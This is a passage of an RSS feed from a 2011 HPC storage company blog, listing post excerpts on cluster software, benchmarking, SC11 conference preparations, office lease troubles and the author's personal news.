      <description>&amp;hellip; thanks for being a partner of ours. Unfortunately, the 10x baseline requirement amount of gear that you purchased through other channels doesn&amp;rsquo;t matter to us, you must purchase the baseline amount by years end (today is 15-December) through one of these very specific (and problematic) channels to remain being a partner. Oh, and there are a few other things you have to do by years end, that we&amp;rsquo;ve notified you of only 2 days ago.</description>
    </item>
    
    <item>
      <title>As tiburon progresses ...</title>
      <link>https://blog.scalability.org/2011/12/as-tiburon-progresses/</link>
      <pubDate>Mon, 12 Dec 2011 17:15:47 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/12/as-tiburon-progresses/</guid>
      <description>We are now booting: Redhat 6.1, Centos 6.0, Ubuntu 11.04, and others (including VMs!) via tiburon. Completely painless for compute and storage nodes. This is letting us get to the next phase: Application Specific Nodes (or &amp;ldquo;appliances on demand&amp;rdquo; in more common language). Basic idea is, spend zero &amp;hellip; identically zero time on your expensive private/public cluster/cloud/grid/yadda yadda doing an installation. Seriously, you should not be paying cloud providers for this, and if you are, this is a problem.</description>
    </item>
    
    <item>
      <title>Semi OT:  New laptop is in</title>
      <link>https://blog.scalability.org/2011/12/semi-ot-new-laptop-is-in/</link>
      <pubDate>Sun, 11 Dec 2011 14:22:17 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/12/semi-ot-new-laptop-is-in/</guid>
      <description>Have Linux loaded. And windows 7 pro (actually upgraded from the windows 7 home they had). Ok &amp;hellip; I like it. It is very fast. About as heavy (maybe a little more so than the Dell). Keyboard is a chicklet style. I&amp;rsquo;m ok with this, Dell had a more standard type of keyboard. I can touch type on this without problem. If anything, I like it a little better. Graphics are awesome.</description>
    </item>
    
    <item>
      <title>Big memory machines  ... part 2:  This time with working riser cards</title>
      <link>https://blog.scalability.org/2011/12/big-memory-machines-part-2-this-time-with-working-riser-cards/</link>
      <pubDate>Thu, 08 Dec 2011 19:57:58 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/12/big-memory-machines-part-2-this-time-with-working-riser-cards/</guid>
      <description>Yeah baby!
 top - 14:55:24 up 2:38, 1 user, load average: 0.13, 0.17, 0.17 Tasks: 697 total, 1 running, 696 sleeping, 0 stopped, 0 zombie Cpu(s): 0.1%us, 0.1%sy, 0.0%ni, 99.8%id, 0.0%wa, 0.0%hi, 0.0%si, 0.0%st Mem: 1009.840G total, 18.159G used, 991.680G free, 0.000k buffers Swap: 0.000k total, 0.000k used, 0.000k free, 148.590M cached PID USER PR NI VIRT RES SHR S %CPU %MEM TIME+ P COMMAND 4455 root 20 0 15532 1720 944 R 1.</description>
    </item>
    
    <item>
      <title>Update on the lawyer-bomb across our bow</title>
      <link>https://blog.scalability.org/2011/12/update-on-the-lawyer-bomb-across-our-bow/</link>
      <pubDate>Thu, 08 Dec 2011 07:56:26 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/12/update-on-the-lawyer-bomb-across-our-bow/</guid>
      <description>Yeah, with all what we have going on, the last thing we need is a clueless company firing a lawyer-bomb across our bow. Remember that life isn&amp;rsquo;t fair, no time is ever a good time, and sh!t happens. It seems that the whole purpose of their &amp;hellip; er &amp;hellip; communication &amp;hellip; was to try to get us to buy the property rather than taking us to court for rent that is not due them.</description>
    </item>
    
    <item>
      <title>OT: options are known, surgery date is set</title>
      <link>https://blog.scalability.org/2011/12/ot-options-are-known-surgery-date-is-set/</link>
      <pubDate>Thu, 08 Dec 2011 07:29:55 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/12/ot-options-are-known-surgery-date-is-set/</guid>
      <description>In any cancer, it appears the most important thing is to control its growth, arrange for removal, and expedite this process. You don&amp;rsquo;t want the buggers hanging around for longer than needed. We got our surgery date this past Monday. 1 day after my daughter&amp;rsquo;s 12th birthday, my wife will undergo the operation. Its the recovery process we are preparing for, though the sheer velocity of this stuff is hitting hard.</description>
    </item>
    
    <item>
      <title>Ok, I gave in and did it</title>
      <link>https://blog.scalability.org/2011/12/ok-i-gave-in-and-did-it/</link>
      <pubDate>Wed, 07 Dec 2011 02:59:05 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/12/ok-i-gave-in-and-did-it/</guid>
      <description>My trusty Dell laptop is about to be retired. Been a year and a half overdue. Doug was working hard trying to sell me the benefits of Mac Air (he has the company&amp;rsquo;s only unit). He also has the Mac mini on his desk. I need a serious graphics card in the laptop. An NVidia card (for the occasional CUDA programming bit, and some things I work on in the background) is preferred.</description>
    </item>
    
    <item>
      <title>[UPDATED with more info]  regression in Gluster</title>
      <link>https://blog.scalability.org/2011/12/annoying-regression-in-gluster/</link>
      <pubDate>Sun, 04 Dec 2011 20:07:51 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/12/annoying-regression-in-gluster/</guid>
      <description></description>
    </item>
    
    <item>
      <title>Moving web code base from Catalyst to Mojolicious</title>
      <link>https://blog.scalability.org/2011/12/moving-web-code-base-from-catalyst-to-mojolicious/</link>
      <pubDate>Sun, 04 Dec 2011 03:31:01 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/12/moving-web-code-base-from-catalyst-to-mojolicious/</guid>
      <description>Its a long story. For those who don&amp;rsquo;t know, Catalyst is a Perl based web framework. So is Mojolicious. The person who started developing Catalyst years ago, left that group, and started Mojolicious later on. I like many things about Catalyst. Like other MVC frameworks, it lets you divide up your logic between controllers (the heavy lifters), the model (aka the database), and the display logic. Prior to this, I wrote some rather ugly looking code which combined controllers and display logic.</description>
    </item>
    
    <item>
      <title>Monitoring tools</title>
      <link>https://blog.scalability.org/2011/12/monitoring-tools/</link>
      <pubDate>Sun, 04 Dec 2011 02:41:38 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/12/monitoring-tools/</guid>
      <description>We have a collection of tools that we use for various monitoring. Some are the classical standards (iostat, vmstat, &amp;hellip;), the somewhat more heavyweight (collectl, dstat), the simple (not in a bad way) graphical tools (munin, ganglia, &amp;hellip;). We&amp;rsquo;ve found tools like Zabbix do a good job of killing some machines, as there are often memory leaks in these tools. What we&amp;rsquo;ve not found, anywhere, has been a good set of simple measurement tools that provide data in an easy manner that allow for easy inclusion into something akin to a dashboard.</description>
    </item>
    
    <item>
      <title>big memory machines</title>
      <link>https://blog.scalability.org/2011/12/big-memory-machines/</link>
      <pubDate>Fri, 02 Dec 2011 19:23:31 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/12/big-memory-machines/</guid>
      <description>Haven&amp;rsquo;t finished debugging this unit yet. Thought you might like to see top info. These are physical CPUs BTW, not SMT.
top - 09:21:29 up 3 min, 2 users, load average: 0.22, 0.21, 0.09 Tasks: 219 total, 1 running, 218 sleeping, 0 stopped, 0 zombie Cpu0 : 0.7%us, 0.3%sy, 0.0%ni, 99.0%id, 0.0%wa, 0.0%hi, 0.0%si, 0.0%st Cpu1 : 0.0%us, 0.0%sy, 0.0%ni,100.0%id, 0.0%wa, 0.0%hi, 0.0%si, 0.0%st Cpu2 : 0.0%us, 0.0%sy, 0.0%ni,100.0%id, 0.0%wa, 0.</description>
    </item>
    
    <item>
      <title>Ahhh ... drama ... just what I need right now</title>
      <link>https://blog.scalability.org/2011/12/ahhh-drama-just-what-i-need-right-now/</link>
      <pubDate>Thu, 01 Dec 2011 18:49:02 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/12/ahhh-drama-just-what-i-need-right-now/</guid>
      <description>Way back some time ago, our landlord, whom we were somewhat concerned about due to their financial state (lots of vacant spots here in our complex), had their mortgage called by the bank that took over for the bank they&amp;rsquo;ve had before, when it went belly up. That new bank called their loan. They didn&amp;rsquo;t notify us of this until we got the note from the lawyer demanding we pay them rent rather than the landlord.</description>
    </item>
    
    <item>
      <title>OT:  it really focuses your attention on the important things</title>
      <link>https://blog.scalability.org/2011/11/ot-it-really-focuses-your-attention-on-the-important-things/</link>
      <pubDate>Tue, 29 Nov 2011 06:30:21 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/11/ot-it-really-focuses-your-attention-on-the-important-things/</guid>
      <description>[Update below the fold] My wife has this tongue-in-cheek &amp;ldquo;theory&amp;rdquo; on balance in the universe. Comes from being a physics geek I guess (yeah, we are a pair). Maybe I&amp;rsquo;ll tell the &amp;ldquo;spherical horse&amp;rdquo; joke some day again, in public. Our opening of 2011 was, well, crappy. And thats an understatement. We lost her father Frank to cancer. He had fought off one form, and 2 years later, it reared its ugly head.</description>
    </item>
    
    <item>
      <title>I just can&#39;t say enough good things about HP&#39;s procurve networking gear</title>
      <link>https://blog.scalability.org/2011/11/i-just-cant-say-enough-good-things-about-hps-procurve-networking-gear/</link>
      <pubDate>Mon, 28 Nov 2011 20:27:02 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/11/i-just-cant-say-enough-good-things-about-hps-procurve-networking-gear/</guid>
      <description>Basically, their support rocks! Their switches are pretty good to begin with. But (apart from very long phone waits &amp;hellip; 50+ minutes in this case), their support team is exactly what I want to deal with. No nonsense, speaking to someone who knows whats going on with the units. Kudos again to #HP !</description>
    </item>
    
    <item>
      <title>Some of the more mainstream publications are now at least acknowledging the prospect of an epic failure</title>
      <link>https://blog.scalability.org/2011/11/some-of-the-more-mainstream-publications-are-now-at-least-acknowledging-the-prospect-of-an-epic-failure/</link>
      <pubDate>Fri, 25 Nov 2011 17:26:32 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/11/some-of-the-more-mainstream-publications-are-now-at-least-acknowledging-the-prospect-of-an-epic-failure/</guid>
      <description>&amp;hellip; in climategate &amp;hellip; The registers piece isn&amp;rsquo;t bad. Actually quite good. Their thesis is &amp;ldquo;this sort of stuff happens when you get big money/politics following dubious claims, a cottage industry and group think evolve&amp;rdquo;. They note similar examples from other industries. I am not saying I completely agree with their characterization, it sounds reasonable, but it is comparing somewhat dislike things with a similar metric. The issue is the public policy (and money, influence, power, &amp;hellip;) flow from the political class and could polute the underpinnings of the scientific class.</description>
    </item>
    
    <item>
      <title>Senses of urgency</title>
      <link>https://blog.scalability.org/2011/11/senses-of-urgency/</link>
      <pubDate>Wed, 23 Nov 2011 17:42:42 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/11/senses-of-urgency/</guid>
      <description>We do lots of business with customers who want things yesterday. We do what we can to accommodate, but we do build things in a just-in-time model. Avoids costly inventory, and keeps us nimble. This also means we have to micromanage our suppliers. Many don&amp;rsquo;t quite understand what a &amp;ldquo;sense of urgency&amp;rdquo; means. When we tell them we want something by a specific date, and they ship it a month later &amp;hellip; Or a case we are dealing with now, where we&amp;rsquo;ve had a long/huge wait from a supplier, who then shipped us something non-working.</description>
    </item>
    
    <item>
      <title>Announcing dust v1.0</title>
      <link>https://blog.scalability.org/2011/11/announcing-dust-v1-0/</link>
      <pubDate>Tue, 22 Nov 2011 19:17:47 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/11/announcing-dust-v1-0/</guid>
      <description>Dust has finally &amp;hellip;. FINALLY &amp;hellip;. been released. We&amp;rsquo;ve had the driver update packs out there for a while, but finally we&amp;rsquo;ve released DUST. What is DUST you might say? How about a way to automatically update drivers from source/distributions? But wait &amp;hellip; isn&amp;rsquo;t that just dkms? Sort of. We&amp;rsquo;ve found &amp;hellip; horrific problems &amp;hellip; with DKMS that we couldn&amp;rsquo;t solve. We wound up writing scripts to work around DKMS as it didn&amp;rsquo;t build things the way we needed them built.</description>
    </item>
    
    <item>
      <title>Uptick in requests for software only solution</title>
      <link>https://blog.scalability.org/2011/11/uptick-in-requests-for-software-only-solution/</link>
      <pubDate>Mon, 21 Nov 2011 03:07:57 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/11/uptick-in-requests-for-software-only-solution/</guid>
      <description>Some locations are farther than others, and this makes shipping gear pretty expensive. We&amp;rsquo;ve been asked for a software only version of our stack from the 2 remaining continents we don&amp;rsquo;t have installs on (ok, 2 of 3 &amp;hellip; not to much business in Antarctica right now). I won&amp;rsquo;t get into the positives/negatives of this business model. Shipping bits lowers costs as compared to shipping atoms. But atoms are tangible, and require a cost to reproduce patterns that bits don&amp;rsquo;t impose.</description>
    </item>
    
    <item>
      <title>#SC11 benchmarketing gone horribly awry</title>
      <link>https://blog.scalability.org/2011/11/sc11-benchmarketing-gone-horribly-awry/</link>
      <pubDate>Sat, 19 Nov 2011 20:30:04 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/11/sc11-benchmarketing-gone-horribly-awry/</guid>
      <description>OMFG &amp;hellip; we were (and are) continuously inundated with benchmarketing numbers. These numbers purport to represent the system in question. They don&amp;rsquo;t. We can derive their numbers by multiplying the number of drives by the theoretical best case performance, assuming everything else is perfect. Never mind that it never is perfect. Its that the benchmarketing numbers haven&amp;rsquo;t been measured, in a real context. We do the measurements in a real context and report the results to end users.</description>
    </item>
    
    <item>
      <title>#SC11 interviews, observations, and thoughts</title>
      <link>https://blog.scalability.org/2011/11/sc11-interviews-observations-and-thoughts/</link>
      <pubDate>Sat, 19 Nov 2011 20:00:36 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/11/sc11-interviews-observations-and-thoughts/</guid>
      <description>Yeah, this show had lots of folks talking storage. Obviously we did too. Nicole from Datanami (she had a terrible cold running at the time, I hope she is feeling better), asked me to give a short set of non advertising type interviews. Below is what I did, given no prep, no forwarning, and about 30 seconds to mentally prepare (and that might be generous). Part 1: Big Data in Media and Entertainment</description>
    </item>
    
    <item>
      <title>#SC11 wrap up, part 1 (short)</title>
      <link>https://blog.scalability.org/2011/11/sc11-wrap-up-part-1-short/</link>
      <pubDate>Sat, 19 Nov 2011 19:20:10 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/11/sc11-wrap-up-part-1-short/</guid>
      <description>Back in Michigan. ?Long flight, quite tired, but back. This was a good show for us. ?A very good show. ?Gave away lots of siMugs, released siFlash, did demos and had discussions. Generally speaking, we had good booth traffic, and many readers of this blog came by to say hello. ?Thank you for that! ?I very much enjoyed this, and meeting people in person for the first time. Sponsoring Beobash was fun.</description>
    </item>
    
    <item>
      <title>#SC11 T-1 and counting ... Beobash, booth and stuff...</title>
      <link>https://blog.scalability.org/2011/11/sc11-t-1-and-counting-beobash-booth-and-stuff/</link>
      <pubDate>Tue, 15 Nov 2011 08:00:02 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/11/sc11-t-1-and-counting-beobash-booth-and-stuff/</guid>
      <description>Tonight was/is Beobash. ?First time I stopped drinking the beer, and started buying the beer. ?Was very nice, but we were (collectively and individually) exhausted. ?Snapped a few pics. ?Will try to have them up tomorrow. ?Very nice venue. ?Very good crowd. Booth (#SC11 booth 4101) is up. ?Amazingly, everything seems to be working. ?Even missed shipping a few things (yes, yes we did), and for the most part, was able to fix that.</description>
    </item>
    
    <item>
      <title>#SC11 T minus 2 days :  on the plane ... yeah ... on the plane</title>
      <link>https://blog.scalability.org/2011/11/sc11-t-minus-2-days-on-the-plane-yeah-on-the-plane/</link>
      <pubDate>Sun, 13 Nov 2011 21:21:10 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/11/sc11-t-minus-2-days-on-the-plane-yeah-on-the-plane/</guid>
      <description>Somewhere over Montana, around Helena. ?Bumpy weather up ahead. ?Finished PR v1 for siFlash, Doug is editing. ?Will get this out tomorrow at a few venues (we&amp;rsquo;ve promised one specific one will be first). Working on the presentations for the booth. ?siFlash intro, the whole arc with big data, siCluster and our JackRabbit and DeltaV point storage units, and Tiburon. ?And the use cases presentation. ?Didn&amp;rsquo;t have time to get permission to get company name usage permission (e.</description>
    </item>
    
    <item>
      <title>#SC11 T minus 3 days: the $dayjob mailing</title>
      <link>https://blog.scalability.org/2011/11/sc11-t-minus-3-days-the-dayjob-mailing/</link>
      <pubDate>Sat, 12 Nov 2011 22:03:02 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/11/sc11-t-minus-3-days-the-dayjob-mailing/</guid>
      <description>Finally got this out the door. There were some issues in doing so &amp;hellip; our CRM tool seemed to get brain-freeze. Test emails worked fine. But the real ones? Nah &amp;hellip; fuggedaboutit. So here it is, in all its glory. We try our best (really) not to spam. I don&amp;rsquo;t like it and I know our customers don&amp;rsquo;t like it.
Storage Solutions
As a high performance big data storage specialist, Scalable Informatics is well positioned to provide your company with fast, effective, dependable, and cost-effective storage solutions.</description>
    </item>
    
    <item>
      <title>#SC11 T minus 3 days and counting</title>
      <link>https://blog.scalability.org/2011/11/sc11-t-minus-3-days-and-counting/</link>
      <pubDate>Sat, 12 Nov 2011 21:54:36 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/11/sc11-t-minus-3-days-and-counting/</guid>
      <description>Ok. Lets call this an absolutely wild ride so far. I mean, its freaking insane. I cannot remember working so hard and so fast. First off Tiburon, our cluster software package (designed mostly for HPC Storage, and cluster like things) has been an insanely awesome trouper. It just works. And I mean that in a jaw dropping manner. It just freaking works. Part of it may be due to the simplicity of the thing.</description>
    </item>
    
    <item>
      <title>The joys of new tools ... and discovering broken/missing functionality within them</title>
      <link>https://blog.scalability.org/2011/11/the-joys-of-new-tools-and-discovering-brokenmissing-functionality-within-them/</link>
      <pubDate>Sat, 05 Nov 2011 16:07:12 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/11/the-joys-of-new-tools-and-discovering-brokenmissing-functionality-within-them/</guid>
      <description>The object of my attention this morning is dracut, the replacement for the venerable mkinitrd in the RHEL/Fedora lines. Dracut has great promise, in that it is being built as a construction kit for initial ramdisk for booting Linux. Unfortunately, like mkinitrd, it has a number of &amp;hellip; er &amp;hellip; failures. Happily it has a concept of an shell you can drop into if things go pear shaped. mkinitrd generates initrd&amp;rsquo;s that will often simply kernel panic with no way to debug.</description>
    </item>
    
    <item>
      <title>Using Makefiles for analysis pipelines</title>
      <link>https://blog.scalability.org/2011/11/using-makefiles-for-analysis-pipelines/</link>
      <pubDate>Fri, 04 Nov 2011 21:29:36 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/11/using-makefiles-for-analysis-pipelines/</guid>
      <description>Got a mess-of-data. Whole load of it. Need to analyze it. Again and again and again. Don&amp;rsquo;t want to cut n paste. Or write too much code. Need to automate plot generation. This reminded me of my thesis many (cough cough) years ago. I used a Makefile to automate driving TeX. And image formatting, and final document assembly. Yes, to write my thesis, I typed &amp;ldquo;make&amp;rdquo;. Sure enough, same type of process, different decade (cough millennium).</description>
    </item>
    
    <item>
      <title>Almost forgot ... an instant on cluster</title>
      <link>https://blog.scalability.org/2011/11/almost-forgot-an-instant-on-cluster/</link>
      <pubDate>Fri, 04 Nov 2011 21:22:51 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/11/almost-forgot-an-instant-on-cluster/</guid>
      <description>We setup a nice Ubuntu cluster for a customer in the financial services world recently. They wanted something that was similar enough to what they knew, and was as close to painless for them to use as possible. Make it like a Ubuntu system. And make it easy to manage. Real easy. The issue was and is, pretty much none of the major cluster distros really support Ubuntu. A few have some hacks to enable some level of support.</description>
    </item>
    
    <item>
      <title>in SC mode ... and trying to ship orders before we fly out ... and working on support ... and ...</title>
      <link>https://blog.scalability.org/2011/11/in-sc-mode-and-trying-to-ship-orders-before-we-fly-out-and-working-on-support-and/</link>
      <pubDate>Fri, 04 Nov 2011 13:53:25 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/11/in-sc-mode-and-trying-to-ship-orders-before-we-fly-out-and-working-on-support-and/</guid>
      <description>I&amp;rsquo;m gonna need another vacation soon. This is nuts. Got a bunch of machines going out to the UK next week, a set of SSDs off to Sweden, machines to Texas, and California. New orders from the east coast (a number of repeat customers). Oh &amp;hellip; and trying to get our demo systems built, and ready, and the demos up. And get the presentations together. And the PR done. And the investment thingy (gotta nudge the lawyer again, really wanted to announce this by SC11).</description>
    </item>
    
    <item>
      <title>And now readers, its time for deep thoughts ...</title>
      <link>https://blog.scalability.org/2011/10/and-now-readers-its-time-for-deep-thoughts/</link>
      <pubDate>Mon, 31 Oct 2011 20:11:46 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/10/and-now-readers-its-time-for-deep-thoughts/</guid>
      <description>[the guru sits down and starts typing with nonchalance] Complex software stacks lead to complex and often opaque failure modes. [slight bow, stands up, leaves room] Infiniband &amp;hellip;. WHY WHY WHY WHY WHY &amp;hellip; (grumble)</description>
    </item>
    
    <item>
      <title>... and Sandforce is gobbled up by LSI ...</title>
      <link>https://blog.scalability.org/2011/10/and-sandforce-is-gobbled-up-by-lsi/</link>
      <pubDate>Fri, 28 Oct 2011 18:30:09 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/10/and-sandforce-is-gobbled-up-by-lsi/</guid>
      <description>From the register &amp;hellip; This is interesting, as LSI appears to be girding for the next gen in storage. Flash (the PCIe variant) and SSD (the disk channel variant) are on the rise, and things that add value in that chain will be quite interesting acquisitions. We work closely with Virident, and it wouldn&amp;rsquo;t surprise me if they, or Texas Memory Systems were acquired by a larger entity. This isn&amp;rsquo;t consolidation in the classical sense, this is girding for future battle.</description>
    </item>
    
    <item>
      <title>#SC11 countdown and some administrivia</title>
      <link>https://blog.scalability.org/2011/10/sc11-countdown-and-some-administrivia/</link>
      <pubDate>Fri, 28 Oct 2011 04:56:21 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/10/sc11-countdown-and-some-administrivia/</guid>
      <description>So we are on the long march to #SC11 (we are booth 4101, please do stop by!). Figuring out the final bits of the booth content. Working on presentations. Hoping we will have enough disks for the demos I am working on putting together. Then the fun stuff. The mugs: Doug and I had fun with these. Aren&amp;rsquo;t giving them out to everyone &amp;hellip; you have to really cozy up to us for one &amp;hellip; and we will have a Keurig coffee/tea maker there so we can fill em.</description>
    </item>
    
    <item>
      <title>Is this another &#34;Perl indistinguishable from line noise&#34; argument?  Don&#39;t know ...</title>
      <link>https://blog.scalability.org/2011/10/is-this-another-perl-indistinguishable-from-line-noise-argument-dont-know/</link>
      <pubDate>Fri, 28 Oct 2011 03:04:41 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/10/is-this-another-perl-indistinguishable-from-line-noise-argument-dont-know/</guid>
      <description>&amp;hellip; but I do know that the analysis has some &amp;hellip; er &amp;hellip; flaws. Yeah. Flaws. I&amp;rsquo;ll ignore their sample size issue for the moment (though it does go to the size of their error bars &amp;hellip; I hope they appreciate the inverse functional relationship between these two). Take two sets of data with error bars. Put them down on the same graph. The data from each set overlaps within the error bars of the other set.</description>
    </item>
    
    <item>
      <title>A new spin on &#39;hard cases make for bad laws&#39; ... but with benchmark codes</title>
      <link>https://blog.scalability.org/2011/10/a-new-spin-on-hard-cases-make-for-bad-laws-but-with-benchmark-codes/</link>
      <pubDate>Thu, 27 Oct 2011 21:12:42 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/10/a-new-spin-on-hard-cases-make-for-bad-laws-but-with-benchmark-codes/</guid>
      <description>We run (as you might imagine) lots of benchmarks. We do lots of system tuning. We start with null hypotheses and work from there. Sometimes you can call that the baseline expected measurements. Your call on what you want to call it. But a measurement implicitly implies a comparison to a known quantity. In the case of the baseline or null hypothesis, you measure what you should believe to be a reasonable configuration, the way it would be used.</description>
    </item>
    
    <item>
      <title>Iris ... are you our new overlord?</title>
      <link>https://blog.scalability.org/2011/10/iris-are-you-our-new-overlord/</link>
      <pubDate>Wed, 26 Oct 2011 19:43:13 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/10/iris-are-you-our-new-overlord/</guid>
      <description>So I started playing with Iris on my android phone. Not because of Siri envy, but because I heard it was &amp;hellip; er &amp;hellip; interesting. I started out with the usual &amp;hellip; Me: &amp;ldquo;What is the airspeed of an unladen swallow&amp;rdquo; Iris: 28 miles per hour Ok, that was interesting. Then I asked a few other fact based questions, should be easy to answer. Finally, I wanted to see if there was some humor in what it might say (not that Iris has a personality that wishes to express humor, but possibly on the part of its programmers, or in the search results).</description>
    </item>
    
    <item>
      <title>OT:  Minor drama of renting an office</title>
      <link>https://blog.scalability.org/2011/10/ot-minor-drama-of-renting-an-office/</link>
      <pubDate>Wed, 26 Oct 2011 15:04:44 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/10/ot-minor-drama-of-renting-an-office/</guid>
      <description>So we have our site at a nice small light industrial site. Good pricing, reasonable location. Been here 3+ years. The landlord is about to lose the property to either the bank due to their missing paying their mortgage, or the state, because they haven&amp;rsquo;t paid property taxes. Oh, and they haven&amp;rsquo;t paid water or trash collection bills. Found out about all of this last week when we were in NJ installing a cluster.</description>
    </item>
    
    <item>
      <title>anti-scaling (1/N) problems</title>
      <link>https://blog.scalability.org/2011/10/anti-scaling-1n-problems/</link>
      <pubDate>Wed, 26 Oct 2011 04:14:35 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/10/anti-scaling-1n-problems/</guid>
      <description>Imagine you have a fixed sized resource. Imagine you can completely consume that resource from 1 client. Now make this two clients, and completely consume the resource. Which is of fixed size. Each client will get 1/2 (on average) of the resource. Now make this four clients, and completely consume the resource. Which is of fixed size. Each client will get 1/4 (on average) of the resource. Don&amp;rsquo;tcha just love that anti-scaling behavior?</description>
    </item>
    
    <item>
      <title>Design and driver issues exposed under very high loads</title>
      <link>https://blog.scalability.org/2011/10/design-and-driver-issues-exposed-under-very-high-loads/</link>
      <pubDate>Sat, 22 Oct 2011 14:47:59 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/10/design-and-driver-issues-exposed-under-very-high-loads/</guid>
      <description>Most folks, when they build Fibre Channel systems, aren&amp;rsquo;t assuming a very high IOP rate. No, really. Each channel of an FC8 connection is about 1GB/s, which with 4k operations (neglecting overheads and other things), would give you about 256k IOPs. To date, most of these units have been connected to spinning disks, which, individually might max out at 300 IOPs. So from their design perspective, you could put about 874 disks per connection, assuming a perfect configuration, to max out the data channel.</description>
    </item>
    
    <item>
      <title>Semi-OT:  analysis smackdown</title>
      <link>https://blog.scalability.org/2011/10/semi-ot-the-best-papers-and-something-of-an-analysis-smackdown/</link>
      <pubDate>Fri, 21 Oct 2011 22:45:04 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/10/semi-ot-the-best-papers-and-something-of-an-analysis-smackdown/</guid>
      <description>If you haven&amp;rsquo;t seen the meme running around /. and other places, its that the BEST paper(s) &amp;ldquo;confirm&amp;rdquo; (note the scare quotes) AGW. The only problem with this is that its not true. They confirm that GW (climate change) is real (and I am not sure anyone disputes that). Its the &amp;ldquo;A&amp;rdquo; part that is the issue. Its been happening for billions of years. Takes some special sort of (not to mention massive amounts of) hubris to elevate a recent planetary occupant to a special status.</description>
    </item>
    
    <item>
      <title>In the run-up to SC11, yeah ... I&#39;m busy ...</title>
      <link>https://blog.scalability.org/2011/10/in-the-run-up-to-sc11-yeah-im-busy/</link>
      <pubDate>Fri, 21 Oct 2011 03:21:35 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/10/in-the-run-up-to-sc11-yeah-im-busy/</guid>
      <description>Wow &amp;hellip; After getting back from the UK and Sweden, a whole slew of orders came in from several existing and new customers. And booth prep (remember, we are in 4101, stop by and say hello!). And logistics &amp;hellip; and support &amp;hellip; and box tuning (in house, at customer sites, &amp;hellip;) and quoting, and performance monitoring/analysis for several customers (including one where strace seems to have missed child IO processes &amp;hellip;).</description>
    </item>
    
    <item>
      <title>One would think I know this by now ...</title>
      <link>https://blog.scalability.org/2011/10/one-would-think-i-know-this-by-now/</link>
      <pubDate>Wed, 12 Oct 2011 23:23:58 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/10/one-would-think-i-know-this-by-now/</guid>
      <description>&amp;hellip; when you prepare a unit for benchmarking &amp;hellip; mebbe &amp;hellip; mebbe &amp;hellip; its not such a good idea to configure it in &amp;hellip; I dunno &amp;hellip; super-conservative mode which &amp;hellip; er &amp;hellip; effectively nukes most of the performance? Mebbe? Maybe normal default config mode &amp;hellip; which is pretty much what we should have done &amp;hellip; is whats needed? FWIW: for the unit we are bringing to #SC11, 2 initiators over 10GbE iSCSI were running this baby to 850+k IOPs, 4k block random read write (30% mix on write, mostly read) sustained for an hour for well over 100GB of data (far far larger than internal caches).</description>
    </item>
    
    <item>
      <title>A plea for sanity in benchmarking SSDs (and storage)</title>
      <link>https://blog.scalability.org/2011/10/a-plea-for-sanity-in-benchmarking-ssds-and-storage/</link>
      <pubDate>Thu, 06 Oct 2011 00:58:54 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/10/a-plea-for-sanity-in-benchmarking-ssds-and-storage/</guid>
      <description>This is really starting to worry me. I see site after site running similar sets of programs against SSDs, generating the same numbers, within error bars. The problem is that the numbers they generate are meaningless due to several measurement flaws. First: Sandforce controllers compress data. Which means that some data (say simple repeating patterns of, oh, I dunno, zeros?) will compress really well, and show bandwidths far higher than real use cases will measure.</description>
    </item>
    
    <item>
      <title>RIP Steve, and thanks for all the fish</title>
      <link>https://blog.scalability.org/2011/10/rip-steve-and-thanks-for-all-the-fish/</link>
      <pubDate>Thu, 06 Oct 2011 00:29:57 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/10/rip-steve-and-thanks-for-all-the-fish/</guid>
      <description>Steve Jobs, a young man of 56, passed away this evening. While not so much in traditional HPC, Apple profoundly changed the way we work with &amp;hellip; no &amp;hellip; the way we use, and think about using computing technology. He is credited with the vision, though Apple has had and does have many very smart people working there. My condolences to his immediate family, and his extended family. Today, we bought our first Mac book Air.</description>
    </item>
    
    <item>
      <title>Dead on: Redhat grabs Gluster</title>
      <link>https://blog.scalability.org/2011/10/dead-on-redhat-grabs-gluster/</link>
      <pubDate>Tue, 04 Oct 2011 12:46:47 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/10/dead-on-redhat-grabs-gluster/</guid>
